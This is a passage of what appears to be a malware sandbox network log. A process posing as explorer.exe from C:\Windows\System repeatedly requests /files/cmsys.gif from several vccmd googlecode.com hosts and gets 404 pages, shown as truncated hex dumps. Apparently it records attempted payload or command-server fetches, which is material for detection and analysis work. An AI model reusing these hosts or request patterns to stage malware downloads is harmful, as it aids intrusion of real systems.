                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.189438105 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.189624071 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.189881086 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:08 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.190319061 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:08 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.449060917 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    61192.168.2.560707142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:09.456232071 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:10.972855091 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:10 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:10.972870111 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:10.973149061 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:10.974607944 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:10 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:10.982062101 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    62192.168.2.56070964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:13.188565969 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:14.109517097 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:13 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:14.109539032 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    63192.168.2.560710108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:14.319504023 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:15.241906881 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:15 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:15.242187023 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    64192.168.2.560711142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:15.562374115 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.484241009 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:10:16 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
